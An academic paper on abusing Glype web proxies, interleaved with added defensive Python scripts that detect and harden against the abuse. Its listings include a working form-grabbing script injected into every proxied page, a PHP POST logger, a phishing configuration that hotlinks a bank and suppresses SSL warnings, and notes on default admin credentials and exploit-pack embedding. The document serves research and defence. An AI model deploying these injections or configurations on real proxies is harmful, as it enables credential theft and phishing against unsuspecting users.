Abusing Glype Proxies - Attacks, Exploits and Defences
Details about the different types of attacks associated with Glype proxies.
Abusing Glype proxies: attacks, exploits and defences

Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs, and Richard J Enbody, Michigan State University
Network Security, December 2012

Proxies play a critical privacy role because they are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.1

Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as an add-on for Firefox as Proxilla.2 The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can provide some anonymity to the user in addition to other services.

Proxies can also be transformed into attack platforms for exploitation. For example, misconfigured proxies can be exploited by an attacker to steal sensitive information from users. Our study focuses on various attacks and the distribution of malware using Glype proxies. We present a model of the approach used by attackers to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments, we have used Glype versions 1.1 and 1.4. We will present details about the features of Glype proxies that help attackers, and we will conclude by proposing countermeasures.

Background

A number of studies have been conducted in the past regarding the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.3 The study focused on tracking the Koobface malware, which used open ports for incoming connections and hid its operations behind proxies taken from proxy lists. The other, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed methods to defend against them using blacklisting and active monitoring.4 A number of IDS rules were proposed by Brozycki to prevent users from accessing blocked content inside a network.

In this paper, we do not cover network-level anonymisers such as VPNs and TOR. The concept of this paper revolves around web-based anonymity using server-side web proxies. The primary difference between the TOR network and web-based proxies is that TOR implements multi-tier (multi-layer)
anonymity before forwarding the traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.5 In other words, the difference is in the implementation of relays and in the routing of traffic between endpoints.

Huang et al discussed cache-poisoning attacks on transparent proxies using socket Application Programming Interfaces (APIs) in Java and Flash.6 In these attacks, the exploited transparent proxies are configured to route traffic based on the HTTP 'Host:' header while caching at the same time. An attacker poisons the Host: header in the cache using a malicious Flash or Java file that downloads the policy file from the attacker's server. Cache poisoning attacks are quite common in network proxies. The Swiss Security Team discussed the inability of Glype proxies to hide the user's identity entirely.7 Its study showed how misconfiguration of Glype proxies can lead to the disclosure of sensitive information.

Dissecting Glype

The primary purpose of the Glype proxy is to provide the capability of anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies.

To provide proxy services, each URL and each page's internal links are encoded using simple base-64 encoding. For example, consider this URL:

    hxxp://[Glype_proxy_url]/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer

This contains the string 'Oi8vc2NyaXB0bWFmaWEub3JnLw'. A simple base-64 decoding of this string results in '://scriptmafia.org', which shows that the URL decoding process is simple. Care is needed to handle special characters, because the Glype proxy follows the PHP-based encoding/decoding mechanism in which special characters present in variable names are encoded to maintain compatibility with registered global variables.
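To make the encoding concrete from a defender's side, here is an added Python example (not code from the paper or from Glype). It decodes the 'u' parameter exactly as the paper describes and picks such requests out of an organisation's outbound web log, which is the kind of check Brozycki's IDS rules aim at. The log layout, the proxy host webproxy.example and the client addresses are constructed; only the first encoded value is the paper's, the other two are made up for the example.

```python
"""Decode Glype proxied URLs and spot them in an outbound web log.

Added example: not code from the paper or from Glype. It relies only on what the
paper states: browse.php carries the destination in the 'u' query parameter as
URL-escaped base64 with the scheme stripped ('://scriptmafia.org/' in its example).
"""
import base64
import binascii
from urllib.parse import unquote, urlsplit

# Constructed outbound-gateway log lines, "client_ip method url" (invented layout).
# The first 'u' value is the paper's; the other two are made up for this example.
GATEWAY_LOG = [
    "10.0.0.7 GET http://webproxy.example/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer",
    "10.0.0.7 GET http://www.example.com/index.html",
    "10.0.0.9 GET http://webproxy.example/proxy/browse.php?u=Oi8vbS5iYW5rLmV4YW1wbGUvbG9naW4%3D&b=13",
    "10.0.0.9 GET http://webproxy.example/proxy/browse.php?u=not-base64!&b=13",
]


def query_values(query, name):
    """Return the raw (still percent-encoded) values of one query parameter."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            values.append(value)
    return values


def decode_glype_u(value):
    """Decode one 'u' value; None if it is not valid base64.

    unquote is used rather than unquote_plus: a literal '+' here is base64 data,
    not an encoded space. Missing '=' padding is tolerated.
    """
    raw = unquote(value)
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def destination_host(decoded):
    """Host part of a decoded value such as '://scriptmafia.org/' (scheme absent, as in the paper)."""
    rest = decoded[3:] if decoded.startswith("://") else decoded
    return rest.split("/", 1)[0] or None


def find_proxied_requests(log_lines):
    """Return (client, proxy_host, destination_host) for every browse.php?u= request that decodes."""
    hits = []
    for line in log_lines:
        client, _, url = line.split(" ", 2)
        parts = urlsplit(url)
        if not parts.path.endswith("/browse.php"):
            continue
        for value in query_values(parts.query, "u"):
            decoded = decode_glype_u(value)
            if decoded:
                hits.append((client, parts.hostname, destination_host(decoded)))
    return hits


if __name__ == "__main__":
    for client, proxy, dest in find_proxied_requests(GATEWAY_LOG):
        print("%s reached %s via Glype proxy %s" % (client, dest, proxy))
```

The third log line shows why the decoder must reject non-base64 input rather than crash: a gateway log will contain plenty of other browse.php pages, and a single malformed value should not stop the scan.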
The Glype proxy can be extended using plugins. For example, popular websites such as Facebook, Twitter and Gmail have separate plug-ins for the Glype proxy. Web page processing is handled by Glype's 'process.php' page. For simplicity, the Glype proxy injects JavaScript code into web pages to avoid sending requests to the process.php page using HTTP POST requests. The Glype proxy uses HTTP headers such as 'Referer:' and 'Location:' for redirection purposes.

Google can be used to search for misconfigured Glype proxies. By default, Glype logs its activities to a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to easily craft efficient Google queries (Google dorks) to search for misconfigured proxies. The Glype proxy has default credentials {username=admin, password=admin}. The password is hardcoded as an MD5 hash, but is susceptible to brute force attack. For secure configurations, the hash should be replaced.

In addition, in its default configuration, the Glype proxy uses no cache. Listing 1 shows the implementation of the cache module in the Glype proxy. However, it is still possible to configure the Glype proxy to send some cache headers using session_cache_limiter('private_no_expire').

Listing 1: Cache module in the Glype proxy

    # Send no-cache headers.
    function sendNoCache() {
        header( 'Cache-Control: no-store, no-cache, must-revalidate' );
        header( 'Cache-Control: post-check=0, pre-check=0', false );
        header( 'Pragma: no-cache' );
    }

Glype proxies suffer from several design flaws that are exploited by attackers. Some of the issues that make Glype proxies an effective hacker tool are discussed below.

Logging mechanism

By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user's identity. Since Glype is written in PHP, an attacker can make several modifications that turn the Glype proxy into a tool for the successful execution of attacks. There are different kinds of information that attackers can easily steal by misconfiguring the parameters of the Glype proxy and writing an advanced plugin for capturing data.

Listing 2 shows the type of information logged when the user surfs a website through a Glype proxy. It basically captures GET requests and records the requesting IP address together with the URLs visited.

Listing 2: Logs in Glype Proxy

    68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
    68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
    68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
    68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
    68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr

Glype proxies also allow attackers to extract cookies – a potentially valuable source of personal information. The Glype proxy only provides an option for deleting cookies on the client side, not on the server side. To provide anonymity the cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the extracted cookies of a user who visited Facebook.

In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section.

IP banning and restriction

Glype proxies provide impressive functionality to restrict IP addresses using the BlockScript web software.8 It was designed to enable administrators to restrict HTTP requests from unwanted domains. However, this functionality is also useful for launching targeted attacks in which attackers target a specific set of IP addresses and restrict others. This property can also subvert the generic method of analysing servers by testing them remotely.

A Glype proxy uses an IP banning module as shown in Listing 4. In that code, a Glype proxy looks up the IP addresses that are restricted or blacklisted to start the verification check. If an IP address is found in the lists, the Glype proxy returns a '403 Forbidden' response to the user. To make it more malicious, attackers can serve malicious web pages showing the IP-banned message. In this way, a user is not able to surf anonymously and still gets infected. There are many modifications that can be made in the code for playing around with IP address restrictions.
Listing 3: Cookies collected by Glype Proxy

    #HttpOnly_.facebook.com   TRUE   /   FALSE   1394475951   datr          V4tbT71wsBGdD8j2XZgUBDlJ
    .facebook.com             TRUE   /   FALSE   0            lsd           1W12c
    #HttpOnly_.facebook.com   TRUE   /   FALSE   0            m_ts          1331403951
    .facebook.com             TRUE   /   FALSE   1            reg_ext_ref   deleted
    .facebook.com             TRUE   /   FALSE   0            reg_fb_gate   http%3A%2F%2Fm.facebook.com%2F
    .facebook.com             TRUE   /   FALSE   0            reg_fb_ref    http%3A%2F%2Fm.facebook.com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522

Listing 4: IP Banning Module

    if ( empty($_SESSION['ip_verified']) || $_SESSION['ip_verified'] != $_SERVER['REMOTE_ADDR'] ) {
        if (!$CONFIG['enable_blockscript']) {
            # Current IP matches a banned IP? true/false
            $banned = false;
            # Examine all IP bans
            foreach ( $CONFIG['ip_bans'] as $ip ) {
                # Is this a range or single?
                if ( ($pos = strspn($ip, '0123456789.')) == strlen($ip) ) {
                    # Just a single IP so check for a match
                    if ( $_SERVER['REMOTE_ADDR'] == $ip ) {
                        # Flag the match and break out the loop
                        $banned = true;
                        break;
                    }
                    # And try next IP
                    continue;
                }
                // ----- Redacted ----- //
            }
            # Is the IP address banned?
            if ( $banned ) {
                # Send a Forbidden header
                header('HTTP/1.1 403 Forbidden', true, 403);
                # Print the banned page and exit!
                echo loadTemplate('banned.page');
                exit;
            }
        }
        # Still here? Must be OK so save IP in session to prevent rechecking next time
        $_SESSION['ip_verified'] = $_SERVER['REMOTE_ADDR'];
    }
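As an added example (not part of the paper, and not Glype code), the following Python script shows what a reader of a leaked Glype log folder learns from the two artefacts above: it parses lines in the Listing 2 layout and a cookie jar in the tab-separated Netscape layout that Listing 3 shows, then summarises hosts per client and cookies per domain. The log lines, hosts, client addresses and cookie values are all constructed; the '#HttpOnly_' prefix and the expiry-0-means-session convention are the standard cookie-jar rules, visible in Listing 3 as well.

```python
"""Exposure audit for the contents of a Glype proxy's log folder.

Added example, not code from the paper or from Glype. Input: 'ip, timestamp, url'
log lines (Listing 2 layout) and Netscape-format cookie-jar lines (Listing 3
layout). Output: what each client did and which cookies the server still holds.
"""
import json
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed log lines in the Listing 2 layout; addresses and hosts are invented.
LOG_LINES = [
    "192.0.2.10, 07/Mar/2012:21:15:54 -0500, http://m.social.example",
    "192.0.2.10, 07/Mar/2012:21:16:14 -0500, https://m.social.example/login.php?refid=8",
    "192.0.2.10, 07/Mar/2012:21:16:15 -0500, https://static.cdn.example/img/logo.png",
    "192.0.2.44, 07/Mar/2012:21:20:01 -0500, https://bank.example/online/signin",
]

# Constructed Netscape cookie-jar lines (tab separated), as in Listing 3:
# domain, include-subdomains, path, secure, expiry, name, value.
# "#HttpOnly_" on the domain marks a cookie browsers hide from scripts; expiry 0 is a session cookie.
COOKIE_LINES = [
    "#HttpOnly_.social.example\tTRUE\t/\tFALSE\t1394475951\tdatr\tCONSTRUCTED1",
    ".social.example\tTRUE\t/\tFALSE\t0\tlsd\tCONSTRUCTED2",
    "#HttpOnly_.social.example\tTRUE\t/\tFALSE\t0\tm_ts\t1331403951",
    "#HttpOnly_bank.example\tFALSE\t/online\tTRUE\t0\tSESSIONID\tCONSTRUCTED3",
]

HTTPONLY_PREFIX = "#HttpOnly_"


def parse_log_line(line):
    """Split one 'ip, timestamp, url' line into its three fields."""
    ip, stamp, url = (part.strip() for part in line.split(",", 2))
    return ip, stamp, url


def parse_cookie_line(line):
    """Parse one Netscape cookie-jar line into a dict (the value is deliberately not kept)."""
    domain, _subdomains, path, secure, expiry, name, _value = line.split("\t")
    httponly = domain.startswith(HTTPONLY_PREFIX)
    if httponly:
        domain = domain[len(HTTPONLY_PREFIX):]
    return {
        "domain": domain,
        "path": path,
        "secure": secure == "TRUE",
        "httponly": httponly,
        "persistent": int(expiry) != 0,
        "name": name,
    }


def exposure_report(log_lines, cookie_lines):
    """Per client IP, the hosts visited; per domain, the cookies retained server-side."""
    hosts_by_client = defaultdict(set)
    for line in log_lines:
        ip, _, url = parse_log_line(line)
        hosts_by_client[ip].add(urlsplit(url).hostname)
    cookies_by_domain = defaultdict(list)
    for line in cookie_lines:
        cookie = parse_cookie_line(line)
        cookies_by_domain[cookie["domain"]].append(cookie)
    return {
        "clients": {ip: sorted(hosts) for ip, hosts in hosts_by_client.items()},
        "cookies": dict(cookies_by_domain),
    }


def retained_httponly_cookies(report):
    """Names of HttpOnly cookies in the jar: the flag shields them from page scripts,
    not from whoever can read the proxy's cookie folder."""
    names = [c["name"] for cookies in report["cookies"].values() for c in cookies if c["httponly"]]
    return sorted(names)


if __name__ == "__main__":
    report = exposure_report(LOG_LINES, COOKIE_LINES)
    print(json.dumps(report, indent=2))
    print("HttpOnly cookies held server-side:", retained_httponly_cookies(report))
```

The point the report makes is the paper's: deleting cookies in the browser does nothing to a jar the proxy keeps on disk, and HttpOnly and Secure are browser-side controls that mean nothing once the value sits in a file under the proxy's tmp directory.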
Threat model

Examining the threat model allows us to understand the role of the various actors involved and how attackers exploit the integrity of users by conducting attacks. The model basically covers the threats associated with end users and administrators. Since we are concerned here with the Glype proxy, the attacks are modelled around the Man-in-the-Middle (MitM) paradigm.

During our research, we noticed that Glype proxies are configured in a very insecure way – for example, using default or weak passwords. This misconfiguration allows attackers to successfully compromise the proxy software using brute-force attacks. The primary risk is that attackers now exploit third-party resources – including infrastructure, traffic density, etc – to exploit users at a large scale. Glype is a server-side proxy and compromising it has serious implications.

The Glype proxy provides anonymity on the web. Its users are susceptible to a wide variety of attacks. The primary aim of the attacker is to force the users to surf Internet resources through the Glype proxy. The users' surfing habits and trust play a significant role in the execution of insidious attacks. Information stealing, phishing, Cross-Frame Scripting (XFS) and so on are some of the attacks that can be triggered easily using a Glype proxy. Since the Glype proxy is open source, the code can be modified using inherent features that make it a more powerful weapon. In the next section, we discuss some of the attacks using custom plugins. Remember, Glype is not a client-side proxy, but it infects and modifies the proxied web pages served to the users.

Launching attacks using Glype

Attacks triggered using Glype proxies are based on the concept of the Man-in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two end points on the network. It is quite easy to equate the Glype proxy with an MitM agent because the traffic originating from the infected machine is routed through the Glype proxy interface before it is processed by the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between the client's browser and the web server. As a result, the user is served with illegitimate and malicious content that subverts the normal operations of browsers. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection at a large scale.

Data exfiltration – form grabbing

Data exfiltration attacks are conducted to steal sensitive information from infected machines on the Internet. It is easy to exfiltrate data from users who use Glype proxies. These proxies provide a configuration file for managing the current run state, and it appears possible for an attacker to infect all the proxified web pages with illegitimate content. To test that theory, we conducted an experiment to understand the impact of infecting proxied web pages. We noticed that a Glype proxy provides certain configuration parameters that can be used to inject malicious content that gets rendered in all the web pages that are proxied. This capability can be devastating.

We implemented a small program using jQuery to grab all the POST requests. Listing 5 provides the set of scripts that we used in our tests, which are described as follows:

  • Code (1) is used to serialise the data present in the forms. This code serialises the data entered by the users in input boxes in the forms and submits the data to the malicious domain. This code is passed as a parameter to the 'footer_include' configuration, and so is injected at the bottom of all the proxied web pages.
  • Code (2) differs in that it does not send the form data to the server but rather triggers an alert notification. This code is used for validating successful insertion of scripts in the web pages.
  • Code (3) is used to handle the incoming data and store it in the log file for analysis.

By using the code discussed in Listing 5, it is possible to log all the POST requests sent by the user's browser through the Glype proxy's interface. The POST data can be logged on the server side as shown in Listing 6. Figure 1 shows the successful execution of a script inserted in the proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy.

Cross-frame scripting and phishing

Cross-Frame Scripting (XFS) is an advanced attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. An attacker loads the target website in an HTML iframe or frame and forces the JavaScript from the primary domain to interact with the target website that is loaded in the frame. XFS allows attackers to force the legitimate user to perform rogue operations without their knowledge. XFS can be launched to trigger phishing attacks. To counter this attack many websites are using anti-XFS code.9 HTML 5 has the built-in attribute 'sandbox', defined as a part of the iframe tag, that can be used to bypass the restrictions, as described here.10

Despite this fact, a Glype proxy has the ability to rewrite URLs while proxying the content of the domain. A Glype proxy caches the URL and then applies the proxify function to rewrite it. To make it look legitimate, an attacker can configure the Glype proxy in such a way that phishing attacks look more original by subverting the XFS protections. We conducted an experiment using Glype proxy version 1.1 and made configuration changes in the settings.php file in order to tweak the Glype proxy to execute a phishing attack. We also modified the code to execute advanced attacks to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack code.
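For a proxy operator checking their own served pages, or a gateway inspecting pages that arrive from a suspect proxy, the footer_include injection described in the Data exfiltration section (Listing 5) has a recognisable shape: an inline script that hooks form submission, serialises the form and posts it somewhere. The Python below is an added example, not code from the paper or from Glype, that pulls inline scripts out of an HTML document and flags that combination. Both sample pages are constructed; the injected one follows the paper's Code (1) with an invented script host, the benign one hooks submit only for client-side validation.

```python
"""Flag HTML pages that carry a form-grabbing script of the Listing 5 kind.

Added example, not code from the paper or from Glype. Heuristic: an inline script
that (a) hooks form submission, (b) serialises the form and (c) sends it somewhere.
"""
import re
from html.parser import HTMLParser

# Constructed page carrying an injected footer in the shape of the paper's Code (1); cdn.example is invented.
INJECTED_PAGE = """<html><body>
<form action="/login" method="post"><input name="user"><input name="pass" type="password"></form>
<script src="http://cdn.example/jquery.min.js"></script>
<script>
$('form').submit( function() {
  var yup = $('form').serialize();
  $.post("logit.php", yup, function (data){});
});
</script>
</body></html>"""

# Constructed benign page: hooks submit only to validate a field locally.
BENIGN_PAGE = """<html><body>
<form action="/login" method="post" id="f"><input name="user"></form>
<script>
document.getElementById('f').addEventListener('submit', function (e) {
  if (!document.querySelector('[name=user]').value) { e.preventDefault(); alert('Enter a username'); }
});
</script>
</body></html>"""

SUBMIT_HOOK = re.compile(r"""\.submit\s*\(|addEventListener\s*\(\s*['"]submit['"]""")
SERIALISE = re.compile(r"""\.serialize\s*\(|new\s+FormData\s*\(""")
# jQuery/fetch/beacon style calls with a literal URL as first argument.
POST_CALL = re.compile(
    r"""(?:\$\.post|\$\.ajax|fetch|navigator\.sendBeacon)\s*\(\s*(?:\{[^}]*url\s*:\s*)?['"]([^'"]+)['"]""")
# XMLHttpRequest style: xhr.open("POST", url)
XHR_OPEN = re.compile(r"""\.open\s*\(\s*['"]\w+['"]\s*,\s*['"]([^'"]+)['"]""")


class ScriptCollector(HTMLParser):
    """Collect inline script bodies and external script sources from a document."""

    def __init__(self):
        super().__init__()
        self.inline, self.external, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data


def find_form_grabbers(html):
    """One finding per inline script that hooks submit, serialises the form and posts it."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for body in collector.inline:
        targets = POST_CALL.findall(body) + XHR_OPEN.findall(body)
        if SUBMIT_HOOK.search(body) and SERIALISE.search(body) and targets:
            findings.append({"posts_to": targets, "external_scripts": list(collector.external)})
    return findings


def is_suspicious(html):
    return bool(find_form_grabbers(html))


if __name__ == "__main__":
    print("injected:", find_form_grabbers(INJECTED_PAGE))
    print("benign:", find_form_grabbers(BENIGN_PAGE))
```

Because the paper's logger sits on the proxy host itself ("logit.php" is a relative URL), a check that only looks for cross-origin posts would miss it; the heuristic therefore keys on the hook-serialise-send pattern and reports the target whatever its origin.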
In our code, Secure Socket Layer (SSL) protocol warnings are turned off. This modification allows the Glype proxy to quash all the SSL-based warnings. We also enabled hotlinking, the process of directly loading content from a third-party domain. In a Glype proxy, hotlinking allows the attacker to force the user to visit an XFS web page directly. We enabled caching for faster execution. Caching of files such as CSS, images and so on forces the browser to store the content locally and use it directly without sending requests to the web server. This way, the attacker can speed up the loading of web pages in the client's browser. Finally, we allowed JavaScript for communication with different objects on the web page. JavaScript is an essential component of many websites and applications. For example, banking websites use JavaScript for communicating with different objects in a dynamic manner. The attacker also benefits from this because it allows the attacker to execute any arbitrary script in the context of a proxied website.

We tested this configuration and found that it is possible to use XFS for conducting a phishing attack, as shown in Figure 2. Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, a legitimate Bank of America website is framed inside a Glype proxy interface without any warnings. This means an attacker can inject scripts as discussed earlier to interact with various objects on the web page. Typically, the user believes that he/she is surfing the bank website through a legitimate proxy, but in reality all the information can be easily captured from the user's session.

In the above layout, the URL points to the domain where the Glype proxy is hosted.
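The settings just described are the attacker's profile. As an added example (not code from the paper or from Glype), the Python script below audits a settings.php fragment against the opposite policy, also covering the default-credential and log-exposure advice the paper gives under Proactive steps, and writes out corrected lines. The fragment is constructed to mirror Listing 7 plus a default admin credential; the key names ssl_warning, stop_hotlinking, hotlink_domains, cookies_on_server, cookies_folder, tmp_dir, enable_logging and footer_include are the ones the paper shows, while admin_user and admin_pass are assumed names for the credential settings and should be checked against the real file.

```python
"""Audit a Glype settings.php fragment for the settings the paper shows attackers turning on.

Added example, not code from the paper or from Glype. Parses simple
"$CONFIG['key'] = value;" lines, reports weak values, and emits hardened lines.
"""
import hashlib
import re

DEFAULT_ADMIN_HASH = hashlib.md5(b"admin").hexdigest()  # the paper: default admin/admin stored as MD5

# Constructed fragment mirroring Listing 7 plus the default admin credential.
# admin_user / admin_pass are ASSUMED key names; the rest appear in the paper.
WEAK_SETTINGS = """
$CONFIG['admin_user'] = 'admin';
$CONFIG['admin_pass'] = 'DEFAULT_HASH';
$CONFIG['ssl_warning'] = false;
$CONFIG['stop_hotlinking'] = false;
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
$CONFIG['cookies_on_server'] = true;
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
$CONFIG['enable_logging'] = true;
$CONFIG['footer_include'] = '<script src="http://cdn.example/x.js"></script>';
""".replace("DEFAULT_HASH", DEFAULT_ADMIN_HASH)

LINE = re.compile(r"^\s*\$CONFIG\['(\w+)'\]\s*=\s*(.*?);\s*(?://.*)?$", re.M)


def parse_value(raw):
    """true/false -> bool, 'text' -> str, array('a','b') -> list, anything else kept as ('expr', text)."""
    raw = raw.strip()
    if raw in ("true", "false"):
        return raw == "true"
    m = re.fullmatch(r"'((?:[^'\\]|\\.)*)'", raw)
    if m:
        return m.group(1)
    m = re.fullmatch(r"array\((.*)\)", raw)
    if m:
        return re.findall(r"'([^']*)'", m.group(1))
    return ("expr", raw)


def parse_settings(text):
    return {key: parse_value(raw) for key, raw in LINE.findall(text)}


def audit(config):
    """(key, problem) pairs for settings that match the attacker profile described in the paper."""
    findings = []
    if config.get("admin_pass") == DEFAULT_ADMIN_HASH:
        findings.append(("admin_pass", "admin password is the default md5('admin'); widely known and brute-forceable"))
    if config.get("ssl_warning") is False:
        findings.append(("ssl_warning", "SSL warnings suppressed: users get no notice when a proxied HTTPS site fails validation"))
    if config.get("stop_hotlinking") is False:
        domains = ", ".join(config.get("hotlink_domains") or []) or "any site"
        findings.append(("stop_hotlinking", "hotlinking allowed: proxy URLs for %s can be embedded directly, e.g. in phishing mail" % domains))
    if config.get("cookies_on_server") is True:
        findings.append(("cookies_on_server", "cookies retained server-side: the jar outlives the session and HttpOnly does not protect it there"))
    if config.get("enable_logging") is True:
        findings.append(("enable_logging", "client IP and URL logging is on: keep tmp_dir outside the web root or deny it in .htaccess"))
    footer = config.get("footer_include")
    if isinstance(footer, str) and "<script" in footer.lower():
        findings.append(("footer_include", "a script is injected into every proxied page: remove it unless you wrote it"))
    return findings


HARDENED = {"ssl_warning": True, "stop_hotlinking": True, "hotlink_domains": [],
            "cookies_on_server": False, "footer_include": ""}


def harden(config, new_admin_password):
    """Apply the hardened values and replace the admin hash (MD5 is what the paper says Glype stores,
    so use a long random password: MD5 itself is fast to brute-force)."""
    fixed = dict(config)
    fixed.update(HARDENED)
    fixed["admin_pass"] = hashlib.md5(new_admin_password.encode()).hexdigest()
    return fixed


def render(config):
    """Write the dict back as $CONFIG lines."""
    lines = []
    for key, value in config.items():
        if isinstance(value, bool):
            php = "true" if value else "false"
        elif isinstance(value, list):
            php = "array(%s)" % ", ".join("'%s'" % d for d in value)
        elif isinstance(value, tuple):
            php = value[1]
        else:
            php = "'%s'" % value
        lines.append("$CONFIG['%s'] = %s;" % (key, php))
    return "\n".join(lines)


if __name__ == "__main__":
    weak = parse_settings(WEAK_SETTINGS)
    for key, problem in audit(weak):
        print("%-18s %s" % (key, problem))
    print(render(harden(weak, "CONSTRUCTED-long-random-passphrase")))
```

Logging stays on in the hardened output on purpose: the paper's advice is not to disable it but to keep the log folder out of reach, so the audit keeps reporting it as something to verify on the server rather than silently flipping it off.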
As hotlinking is allowed and the Glype proxy does not present any message, the attacker can also use the Glype proxy URL (pointed at the bank domain) and embed it in phishing emails for distribution among a large number of users. When a user clicks the malicious link, he/she is redirected towards the Glype proxy interface, which automatically loads the legitimate bank website. An attacker can also install a Glype proxy on familiar-looking domain names to make the phishing attack look more appealing, and hence more effective.

Listing 5: Injecting Code in Glype Proxy Parameter

    // ---- Code (1) ---- //
    $CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
    <script>
    $(\'form\').submit( function() {
        var yup = $(\'form\').serialize();
        $.post("logit.php", yup, function (data){});
    });
    </script>';

    // ---- Code (2) ---- //
    $CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
    <script>
    $(\'form\').submit( function() {
        alert( $(\'form\').serialize() );
    });
    </script>';

    // ---- Code (3) ---- //
    <?php
    $file = fopen("postlog.txt", 'a');
    foreach( $_POST as $key => $value ) {
        fwrite($file, $key.":".$value."\n");
    }
    fclose($file);
    ?>

Listing 6: Extracted Data from HTTP POST (FORM Submit) Request

    lsd:
    post_form_id:7eb4ce3be4f996e756e1f54ac474d578
    charset_test:€,´,€,´,水,Д,Є
    version:1
    ajax:1
    width:1280
    pxr:1
    gps:1
    email:FACEBOOK_USER@facebook.com
    pass:FACEBOOK_PASSWORD
    m_ts:1332258635
    li:MqdoT8wNn91Ak0OT4rUUGUHg

Malware distribution

Glype proxies can be used for attacking corporate networks to spread infections. Considering the characteristics of a Glype proxy, it is possible for attackers to create an embedded toolkit using a Glype proxy for distributing malware that is highly targeted. The complete model is presented below.

Hosting Glype proxy: to begin, the attacker hosts the Glype proxy tool on a compromised domain. As described earlier, web searching can reveal a number of misconfigured Glype proxies on the Internet. It is not difficult for an attacker to hack a misconfigured proxy and use it for malicious purposes. Once a proxy is successfully installed on the compromised domain, the attacker configures it for the attack using the scenarios described in earlier sections. There are two primary configuration checks that an attacker wants to implement:

  • Logging: this allows the attacker to keep track of the activity happening through the proxy. For example, an attacker can install a custom POST logger plugin for stealing data in HTTP POST requests.
  • IP banning: this allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This functionality is useful in targeted infections.

Embedding a browser exploit pack in Glype: after successful installation of a Glype proxy, the next step is to embed an iframe having a URL pointing to a Browser Exploit Pack (BEP).11 The iframe can be hidden or obfuscated depending on the requirements. A BEP is a framework that has a number of exploits bundled together. A BEP begins by fingerprinting the user's browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs that are frequently used for infections. It is possible to embed a single exploit code directly in the Glype proxy web page.
This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically into all the proxied web pages for stealthy infections. The main motive behind this process is to exploit the user's browser when a proxied web page is opened. Additionally, many proxy users believe that surfing online anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link pointing to a BEP is not a hard task in the Glype proxy.

Figure 1: Stealing credentials by injecting code in a Glype proxy.

Listing 7: Configuration Parameters Required for Bypassing XFS and Executing Phishing

    // Configure SSL warnings
    $CONFIG['ssl_warning'] = false;
    // Managing hotlinking
    $CONFIG['stop_hotlinking'] = false;
    // Specifying the target domain for hotlinking
    $CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
    // Storing cookies on the server
    $CONFIG['cookies_on_server'] = true;
    // Setting cookies path
    $CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
    // Enable logging
    $CONFIG['enable_logging'] = true;

Figure 2: Phished web page in a Glype proxy.

